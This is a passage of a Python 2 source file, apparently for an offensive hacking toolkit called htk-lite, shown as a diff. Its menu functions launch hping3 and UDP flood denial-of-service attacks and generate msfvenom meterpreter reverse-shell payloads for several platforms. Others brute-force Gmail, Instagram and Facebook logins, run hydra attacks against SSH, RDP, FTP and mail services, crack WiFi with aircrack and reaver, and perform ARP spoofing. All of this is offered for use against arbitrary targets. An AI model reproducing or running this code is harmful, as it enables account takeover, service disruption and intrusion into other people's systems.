\033[35m█▪█ \033[0m. \033[35m█ █\033[0m.\033[35m▀█ █▄ █⇡█▌ \033[0m• \033[35m▄ +\033[0m• \033[35m███ \033[0m.\033[35m█▀ \033[0m. \033[35m ▄████▀ \033[0m. \033[35m███ \033[0m. \033[35m▀█▀ █████▄▄██ + \033[0m . . . . \033[35m▀ \033[0m•\033[35m▀\033[0m] + """.decode('utf-8') +def mainbanner7(): + print """\033[31m +██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ +██║ ██║╚\033[91m══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ +███████║ ██║ █████╔╝████\033[33m█╗██║ ██║ ██║ █████╗ +██╔══██║ ██║ ██╔═██╗╚════╝\033[93m██║ ██║ ██║ ██╔══╝ +██║ ██║ ██║ ██║ ██╗ ███████╗██║ ██║ ███████╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝\033[0m + """.decode('utf-8') + +def mainbanner8(): + print """\033[34m +██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ +██║ ██║╚══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ +███████║ ██║ █████╔╝█████╗█\033[94m█║ ██║ ██║ █████╗ +██╔══██║ ██║ ██╔═██╗╚════╝██║ ██║ ██║ ██╔══╝ +██║ ██║ █\033[1;36m█║ ██║ ██╗ ███████╗██║ ██║ ███████╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝ + \033[0m""".decode('utf-8') + +def mainbanner9(): + print """\033[93m +██╗ ██╗████████╗██╗ ██╗ ██╗ ██╗████████╗███████╗ +██║ ██║╚══██╔══╝██║ ██╔╝ ██║ ██║╚══██╔══╝██╔════╝ +███\033[92m████║ ██║ █████╔╝█████╗██║ ██║ ██║ █████╗ +██╔══██║ ██║ ██╔═██╗╚════╝\033[32m██║ ██║ ██║ ██╔══╝ +██║ ██║ ██║ ██║ ██╗ ███████╗██║ ██║ ███████╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ ╚══════╝ + \033[0m""".decode('utf-8') + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,9) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + +def helpbanner(): + a = os.popen("ls commandlist -1 | wc -l").read() + b = a.replace('\n', '') + print """ +╔══════════════════════════════════════════════════════════╗ +║ ║ +║ \033[92m ██░ ██ ▓█████ ██▓ ██▓███ \033[0m ║ +║ \033[90m ▓██░ ██▒▓█ ▀ ▓██▒ ▓██░ ██▒ \033[0m ║ +║ \033[92m ▒██▀▀██░▒███ ▒██░ ▓██░ ██▓▒ \033[0m ║ +║ \033[90m ░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██▄█▓▒ ▒ \033[0m ║ +║ \033[92m ░▓█▒░██▓░▒████▒░██████▒▒██▒ ░ ░ \033[0m ║ +║ \033[94m ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░▒▓▒░ ░ ░ \033[0m ║ +║ \033[90m ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░▒ ░ \033[0m ║ +║ \033[94m ░ ░░ ░ ░ ░ ░ ░░ \033[0m ║ +║ \033[90m ░ ░ ░ ░ ░ ░ ░ \033[0m ║ +║ ║ +║══════════════════════════════════════════════════════════║ +║ Commands: [\033[32m{0}\033[0m] Banners: [\033[31m9\033[0m] ║ +║══════════════════════════════════════════════════════════════════════════════════════╗ +║ ? | this menu ║ +║ exit | exit htkl ║ +║ reboot | reboot htkl ║ +║ clear | clears screen ║ +║ banner | shows a banner ║ +║ command | run a terminal command ║ +║ terminal | open another terminal ║ +║ sysinfo | gather information about your device ║ +║ infoscan | gather information on a host [for a more specific scan type infoscan -o] ║ +║ dos | run Denial-Of-Service attacks ║ +║ payload | Make a msf payload ║ +║ password | crack social media, service and wifi passwords ║ +║ monitor | turn monitor mode on and off [monitor on | monitor off] ║ +║ anon | make yourself anonymous [anon on | anon off] ║ +║ netscan | gather information about your network ║ +║ verscan | scan for a service version on a host ║ +║ wordlist | make wordlists ║ +║ arpspoof | ARP Spoofing ║ +║ traff | show internet traffic ║ +║ hashid | find out what type of hash a hash is ║ +║ aserver | start a apache server ║ +║ dnsspoof | DNS Spoofing [to dns spoof subnet type dnsspoof --all] ║ +║ ║ +║ ║ +║ ║ +║ \033[5m@tuf_unkn0wn\033[0m ║ +╚══════════════════════════════════════════════════════════════════════════════════════╝ + \033[0m\n""".format(b) + +def infoscan(): + try: + target = raw_input("\033[1mTarget:\033[0m ") + port = raw_input("\033[1mPort:\033[0m ") + print "\033[93m! HTTP OR HTTPS !\033[0m\n" + ht = raw_input("[https/http]: ") + if ht == "http": + targetht = 'http://' + if ht == "https": + targetht = 'https://' + print "\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[0m\n" + os.system("curl {0}".format(target)) + print "\n" + ip = socket.gethostbyname(target) + print G+"------------------------\033[0m" + print N+"\033[1mHost:\033[32m ", target + print N+"\033[1mIP:\033[32m ", ip + print G+"------------------------\033[0m" + os.system("curl -I {0}".format(target)) + print "\n" + request = requests.get(targetht + target) + http = request.status_code + if http == 200: + print("\nServer: [\033[32monline\033[0m]") + else: + print("\nServer: [\033[31moffline\033[0m]") + exit() + print "\n" + whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") + print(whois) + print "\n" + os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) + print "\n" + os.system("wafw00f {0}".format(target)) + print "\n" + os.system("sslscan {0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) + print "\n" + os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) + print "\n" + def daf(): + subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", + "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", + "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", + "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", + "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", + "web", "dev"] + + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(target) + showip = socket.gethostbyname(str(hosts)) + print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) + except: + print "\033[0mBypassing..." + + daf() + print "\033[0m" + print "\n" + os.system("nmap -A {0}".format(target)) + print "\n" + os.system("nmap --script dns-brute {0}".format(target)) + print "\n" + a = 'dirb {0}{1}/'.format(targetht,target) + os.system(a) + print "\n" + os.system("nikto -h {0} -p {1}".format(target,port)) + print "\n\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[31m-----\033[33m-----\033[93m-----\033[32m-----\033[1;36m-----\033[94m-----\033[95m-----\033[0m" + except: + print "\033[91mError Something Went Wrong Maybe The Specified Target Is Not Available\033[0m" + +def specscan(): + print """\033[1m +Scans Available:\033[0m + +1: simple nmap portscan + +2: show document info of target with curl + +3: nmap OS detection, version detection, script scanning, and traceroute scan + +4: nmap dns bruteforce + +5: get a hosts ip address + +6: check if a host is online + +7: who-is lookup + +8: dns-lookup + +9: get a hosts source code + +10: web application firewall scanner + +11: run a ssl scan + +12: find the location of a ip address + +13: reverse ip lookup + +14: host search + +15: reverse dns + +16: find shared dns + +17: cloudflare bypass + +18: sslscan + +19: directory scan / bruteforce + +20: nikto scan [this might take awhile to finish] + +go back: go back to main menu + + """ + print "Type a number then your target Ex: 5 www.pornhub.com\n" + j = False + while not j: + try: + option, target = raw_input("\033[1mScan:\033[0m ").split() + if option == "1": + os.system("nmap {0}".format(target)) + if option == "2": + os.system("curl -I {0}".format(target)) + if option == "3": + os.system("nmap -A {0}".format(target)) + if option == "4": + os.system("nmap --script dns-brute {0}".format(target)) + if option == "5": + ip = socket.gethostbyname(target) + print """ + Host: {0} + IP: {1} + """.format(target, ip) + if option == "6": + ht = raw_input("\033[1mHTTP or HTTPS:\033[0m ") + if ht == "https": + targetht = "https://" + if ht == "http": + targetht = "http://" + request = requests.get(targetht + target) + http = request.status_code + if http == 200: + print("\nServer: [\033[32monline\033[0m]") + else: + print("\nServer: [\033[31moffline\033[0m]") + if option == "7": + whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") + print(whois) + if option == "8": + os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) + if option == "9": + os.system("curl {0}".format(target)) + if option == "10": + os.system("wafw00f {0}".format(target)) + if option == "11": + os.system("sslscan {0}".format(target)) + if option == "12": + os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) + if option == "13": + os.system("curl https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) + if option == "14": + os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) + if option == "15": + os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) + if option == "16": + os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) + if option == "17": + def daf(): + subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", + "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", + "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", + "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", + "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", + "web", "dev"] + + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(target) + showip = socket.gethostbyname(str(hosts)) + print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) + except: + print "\033[0mBypassing..." + + daf() + if option == "18": + a = 'sslscan {0}'.format(target) + os.system(a) + if option == "19": + ht = raw_input("HTTP or HTTPS: ") + if ht == "https": + targetht = "https://" + if ht == "http": + targetht = "http://" + a = 'dirb {0}{1}/'.format(targetht,target) + os.system(a) + if option == "20": + port = raw_input("\033[1mPort:\033[0m ") + os.system("nikto -h {0} -p {1}".format(target,port)) + if target == "back": + break + except: + print "\n" + break + j = True + + +def dos(): + print """ +{0}tcp: * tcp target port +{1}udp: * udp target port +{2}syn: * syn target port +{3}ack: * ack target port +{4}xmas: * xmas target port +\033[0m +!Press CTRL C to stop attacking! + """.format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + try: + command, target, port = raw_input("\033[1mMethod:\033[0m ").split() + if command == "tcp": + os.system("service tor restart") + os.system("hping3 --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + if command == "udp": + try: + ip = socket.gethostbyname(target) + port = int(port) + os.system("service tor restart") + sent = 0 + while True: + print N+"UDP attack sending | {6}{5}\033[0m | {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year,ip,random.choice(colorlist)) + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + if port == 65534: + port = 1 + except: + print "\nUDP flood stopped\n" + os.system("") + if command == "syn": + os.system("service tor restart") + os.system("hping3 -S --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + if command == "ack": + os.system("service tor restart") + os.system("hping3 -A --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + if command == "xmas": + os.system("hping3 -X --flood -d 50000 --rand-source -p {0} {1}".format(port,target)) + except: + print "\n\033[91mError: Not Enough Arguments\033[0m\n " + + +def payload(): + print """\033[0m033[1m +Payloads Available:\033[0m + +{0}1: windows/meterpreter/reverse_tcp + +{1}2: android/meterpreter/reverse_tcp + +{2}3: php/meterpreter/reverse_tcp + +{3}4: python/meterpreter/reverse_tcp + +{4}5: ruby/shell_reverse_tcp + +{5}6: osx/x86/vforkshell/reverse_tcp + +{6}7: linux/aarch64/meterpreter/reverse_tcp + + \033[0m""".format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + choice = raw_input("\033[1mPayload:\033[0m ") + lhost = raw_input("\033[1mLHOST: \033[0m") + lport = raw_input("\033[1mLPORT: \033[0m") + name = raw_input("\033[1mFilename: \033[0m") + if choice == "1": + payload = 'msfvenom -p windows/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.exe'.format(lhost, lport, name) + os.system(payload) + if choice == "2": + payload = 'msfvenom -p android/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.apk'.format(lhost, lport, name) + os.system(payload) + if choice == "3": + payload = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost, lport, name) + os.system(payload) + if choice == "4": + payload = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost, lport, name) + os.system(payload) + if choice == "5": + payload = 'msfvenom -p ruby/shell_reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.rb'.format(lhost, lport, name) + os.system(payload) + if choice == "6": + payload = 'msfvenom -p osx/x86/vforkshell/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.app'.format(lhost, lport, name) + os.system(payload) + if choice == "7": + payload = 'msfvenom -p linux/aarch64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.tar'.format(lhost, lport, name) + os.system(payload) + +def gmail(): + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() + +def insta(): + insta = raw_input("\033[1mUsername:\033[0m ") + jl = raw_input("\033[1mWordlist:\033[0m ") + print "\033[1m\033[94m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" + k = raw_input("\033[1mMode:\033[0m ") + ma = 'python3 files/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) + os.system(ma) + +def fb(): + facebook = raw_input("\033[1m[EMAIL/ID->]:\033[0m ") + word = raw_input("\033[1m[WORDLIST->]:\033[0m ") + ks = 'cd files && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def blackhydra(): + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() + +def medusa(): + k = raw_input("\033[1mHost:\033[0m ") + u = raw_input("\033[1mUser:\033[0m ") + p = raw_input("\033[1mWordlist:\033[0m ") + os.system("medusa -d") + print "\n" + m = raw_input("\033[1mModule:\033[0m ") + n = raw_input("\033[1mPort:\033[0m ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) + +def aircrack(): + b = raw_input(G+"\033[1mBSSID: \033[0m") + e = raw_input(G+"\033[1mESSID: \033[0m") + w = raw_input(G+"\033[1mWordlist: \033[0m") + h = raw_input(G+"\033[1mHandshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"\033[1mInterface: \033[0m") + os.system("airmon-ng start " + i) + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) + os.system("airmon-ng stop " + i) + +def reaver(): + os.system("iwconfig") + j = raw_input("\033[1mSelect Interface:\033[0m ") + k = raw_input("\033[1mEnter BSSID:\033[0m ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) + +def password(): + print """ +{0}1: gmail +{1}2: instagram +{2}3: facebook +{3}4: hydra +{4}5: medusa +{5}6: aircrack-ng +{6}7: reaver +\033[0m +go back: go to main menu + """.format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + try: + choice = raw_input("\033[1mAttack:\033[0m ") + if choice == "1": + gmail() + if choice == "2": + insta() + if choice == "3": + fb() + if choice == "4": + blackhydra() + if choice == "5": + medusa() + if choice == "6": + aircrack() + if choice == "7": + reaver() + if choice == "go back": + os.system("") + + except: + print "\n" + +def reboot(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + +def monitoron(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def monitoroff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) + +def command(): + command = raw_input("\033[1mCommand:\033[0m ") + os.system(command) + +def anonon(): + print "\033[93m------------------------\033[0m" + print "\nSTARTING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) + show = 'macchanger -s {0}'.format(k) + os.system(show) + os.system('proxychains python htkl.py --quickrun') + + +def anonoff(): + print "\033[93m------------------------\033[0m" + print "\nSTOPPING MACCHANGER\n" + print "\033[93m------------------------\033[0m" + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) + sys.exit() + reboot() + +def sysinfo(): + os.system("iwconfig") + k = raw_input("\033[1mInterface:\033[0m ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) + os.system("uname -a") + os.system("whoami") + +def netscan(): + print """ +{0}1: scan for devices in your network + +{1}2: scan for networks around you +\033[0m +go back: go back to main menu + """.format(random.choice(colorlist), random.choice(colorlist)) + try: + choice = raw_input("\033[1mScan:\033[0m ") + + if choice == "1": + os.system("netdiscover") + if choice == "2": + os.system("iwconfig") + m = raw_input("\033[1mSelect Interface:\033[0m ") + os.system("airmon-ng start " + m) + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("\033[1m[y/n]>\033[0m ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) + os.system("airmon-ng stop " + i) + if choice == "go back": + os.system("") + except: + print "\n" + +def verscan(): + print """ +Services available: + +{0}ssh + +{1}mysql +\033[0m + """.format(random.choice(colorlist), random.choice(colorlist)) + try: + service = raw_input("\033[1mService: \033[0m") + if service == "ssh": + f = raw_input(G+"\033[1mTarget: \033[0m") + g = raw_input(G+"\033[1mPort: \033[0m") + t = raw_input(G+"\033[1mThreads: \033[0m") + b = raw_input(G+"\033[1mTimeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system('echo "exit\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r sshver.rc') + os.system('rm -rf sshver.rc') + + if service == "mysql": + f = raw_input(G+"\033[1mTarget: \033[0m") + g = raw_input(G+"\033[1mPort: \033[0m") + t = raw_input(G+"\033[1mThreads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system('echo "exit\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') + except: + print "\n" + +def wordlist(): + os.system("cd wordlists && cupp -i") + print Y+"wordlist saved to /root/htk-lite/wordlists \033[0m" + +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("\033[1mTarget/s:\033[0m ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") + +def traff(): + os.system("iwconfig") + s = raw_input("\033[1mSelect Interface:\033[0m ") + os.system("tcpdump -i " + s) + +def hashid(): + try: + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", 